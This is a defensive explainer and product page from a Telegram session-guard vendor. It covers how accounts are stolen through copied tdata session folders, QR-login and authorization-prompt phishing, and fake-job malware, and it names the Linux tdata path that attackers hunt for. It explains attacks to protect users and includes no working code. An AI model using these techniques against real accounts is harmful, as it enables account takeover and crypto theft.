Account takeover
How Telegram accounts actually get stolen (even with 2FA)
Most stolen Telegram accounts are not "hacked" in the way people imagine. Attackers do not guess your password or trick you into reading a code aloud. They steal the already-authorized session itself, usually the tdata folder on your computer, and replay it. No password, no login code, and no 2FA prompt is involved, which is exactly why two-factor authentication does not stop it and why Telegram sends you no alert.
The thing nobody tells you: you were not phished for a password
When people hear "my Telegram got hacked," they picture someone guessing a password or tricking them into reading an SMS code out loud. That happens, but it is not the common case anymore. The common case is quieter and harder to spot: an attacker steals the part of Telegram that keeps you logged in, copies it, and walks straight into your account from their own machine.
That stolen piece is your session. On Telegram Desktop it lives in a folder called tdata. Once someone has it, they do not need your password, your phone, your SMS code, or your 2FA. The login already happened, on your device, with your blessing. They are just replaying it.
This is why so many victims say the same confused thing: "I never shared a code. I never clicked anything obvious. How did this happen?" Here is the honest, plain-language version.
Session theft (the tdata folder): the number one vector
When you log into Telegram Desktop, the app stores a long-lived authorization key on disk so you do not have to re-enter a code every time you open it. That is the tdata folder. It is the digital equivalent of a house key that never expires.
Infostealer malware, the kind that rides in on a cracked app, a malicious browser extension, a poisoned npm or PyPI package, or a "run this to fix your error" command, scans your machine for exactly this folder and exfiltrates it. Security firm Imperva traced a malicious PyPI package whose entire job was to steal the Telegram Desktop tdata folder, noting that with that folder an attacker "doesn't need to bypass passwords or two-factor authentication, they simply steal the session and gain unlimited access" (Imperva, 2025).
This is not theoretical or rare. In April 2026, SANS Internet Storm Center published a honeypot incident where an attacker broke in over SSH and, within seconds, ran a command hunting for ~/.local/share/TelegramDesktop/tdata alongside SMS and modem device paths. The analyst's note is chilling in its clarity: stealing CPU cycles is a short-term gain, but "stealing the Telegram session is a long-term asset," and the attacker was also hunting SMS logs specifically to circumvent the victim's two-factor authentication (SANS ISC, Apr 2026).
And stolen sessions are a commodity. Imperva found forum listings selling ready-to-use Telegram identities, complete with contact lists and live sessions, at prices from roughly $5 for ten accounts up to $400 for a thousand. You can even pick the country.
We took this apart in a lab and measured how fast a guard ends a replayed session: about 140 milliseconds from the moment a poll catches the attacker's second live session. If you want the deep technical version, read we watched an attacker replay a stolen Telegram session.
Why 2FA does not save you here
This is the misconception that costs people their accounts, so it is worth being blunt.
Telegram's two-factor password (the cloud password) protects one specific event: a brand-new login. When someone tries to add a new device with your phone number and SMS code, Telegram demands the 2FA password too. Good. That is real protection against a fresh login.
A stolen session is not a new login. The login already succeeded, on your machine, days or weeks ago. The attacker is reusing that finished login. There is no new-device challenge to pass, so there is nothing for your 2FA password to gate. The same logic applies to the 16-billion-record credential compilation reported in 2025: a lot of those records ship with active session tokens and cookies, and the researchers noted attackers can "bypass MFA by hijacking active sessions" rather than defeating it (Cybernews, 2025).
Turn 2FA on. It genuinely helps against other attacks. Just do not believe it stands between you and a stolen session, because it does not.
And Telegram does not even alert you
Here is the part that makes session theft so cruel. When the attacker replays your stolen session, Telegram does not see an intruder. It sees you, opening your account from a device that is already authorized. So it sends no "new login" warning, no email, no push. The first sign most victims get is their own contacts asking why they are begging for crypto, or a lockout after the attacker quietly changes the number and email.
You will not get a heads-up. By design, there is nothing to warn you about.
The other live vectors worth knowing
QR-login abuse. Telegram lets you log in by scanning a QR code with your phone. Attackers generate a login QR for their own session, dress it up inside a fake "verify your account" or "claim your airdrop" page, and get you to scan it. You think you are confirming something. You are actually authorizing their device.
Authorization-prompt phishing (Feb 2026). Security firm CYFIRMA documented an evolving campaign that abuses Telegram's own authentication workflow. The attacker uses their own Telegram API credentials so that a real, legitimate authorization prompt pops up inside your trusted Telegram app, framed as a routine "security check." You tap Approve, and the attacker gets a fully authorized session without you ever scanning a QR or typing a password (CYFIRMA, Feb 2026). The genius and the evil of it is that the final click happens in the genuine Telegram UI, so every instinct tells you it is safe.
The fake-job and fake-meeting malware lure. If you work in crypto, this one is aimed at you. North Korea-linked groups run elaborate fake recruiting operations: a polished company, a Calendly link, a Telegram contact who walks you to a "video meeting app" or a coding test you need to run locally. Running it installs malware that scrapes wallet extensions like MetaMask and Phantom and, yes, lifts your Telegram session (The Hacker News, 2025). The job interview has quietly become a front line for crypto theft.
The common thread across all four: at no point do you hand over a password. You hand over a live, authorized session.
Why we built Sessions
We are crypto and fintech people, and we spent years watching friends lose Telegram accounts to exactly these attacks, then get hit by a second scam from "recovery experts" in their DMs. The frustrating part is that the takeover is detectable. A replayed session shows up as a second live session that behaves in ways your real one never would.
So we built Sessions, a non-custodial guard that watches your Telegram for hijacked or replayed sessions and unrecognized logins and ends the attacker's session the moment it sees it. It runs inside an attested AWS Nitro enclave, so it cannot read your messages or touch your funds, the code is open source and verifiable, and you can revoke it anytime. We are not a recovery service and we will never claim to be one.
That last point matters: only Telegram itself can recover a hacked account. Anyone who slides into your DMs promising to get it back for a fee is running the second scam. Do not pay them. The honest move is to prevent the takeover from sticking, not to chase a recovery that only Telegram can perform.
If you want to understand why the obvious fix, terminating the attacker's session yourself, usually fails, read why terminating your Telegram sessions does not log the hacker out.
Frequently asked questions
- I have 2FA turned on. How did someone still get into my Telegram?
- Because 2FA only protects a brand-new login. The attacker almost certainly stole your existing, already-authorized session (usually the tdata folder on your computer) and replayed it. The login had already happened on your device, so there was no new-device challenge for your 2FA password to block. Keep 2FA on, but know it does not cover session theft.
- I never shared a code or clicked a phishing link. How is this possible?
- Most takeovers do not need a code or a password. Infostealer malware copies the file that keeps you logged in (tdata) and the attacker reuses it from their own machine. You can be compromised by a cracked app, a malicious browser extension, a poisoned software package, or a fake job or meeting app you were asked to run, without ever typing a credential into a fake page.
- Why did Telegram not warn me that someone logged in?
- Because to Telegram it did not look like a new login. A replayed stolen session looks like you opening your own already-authorized account from another device, so no new-login alert, email, or push is generated. That silence is by design, and it is why session theft is so hard to catch in the moment.
- What is the tdata folder and why do attackers want it?
- tdata is the folder Telegram Desktop uses to keep you logged in without re-entering a code each time. It contains a long-lived authorization key, effectively a house key that never expires. If malware copies that folder, the attacker has full access to your account without your password, your phone, or your 2FA. Stolen tdata is openly bought and sold on forums for a few dollars per account.
- Someone in my DMs says they can recover my hacked Telegram account. Should I pay them?
- No. Only Telegram can recover a hacked account. Anyone promising to recover it for a fee is running the second scam that targets people right after a takeover. Do not pay them and do not share any codes with them. Use Telegram's official recovery flow instead.
- If I cannot rely on 2FA, what actually reduces the risk of session theft?
- Keep your devices clean (no cracked software, no random packages or apps run on request), be suspicious of any QR you are asked to scan or any authorization prompt framed as a routine security check, and periodically review your active sessions in Telegram settings. For continuous protection, a guard that watches for a replayed or unrecognized session and ends it fast addresses the gap that 2FA structurally cannot cover.
Keep reading
Stop a takeover before it starts.
Sessions watches your Telegram around the clock and removes any session that isn’t you, automatically. Open, hardware-attested, and yours to revoke.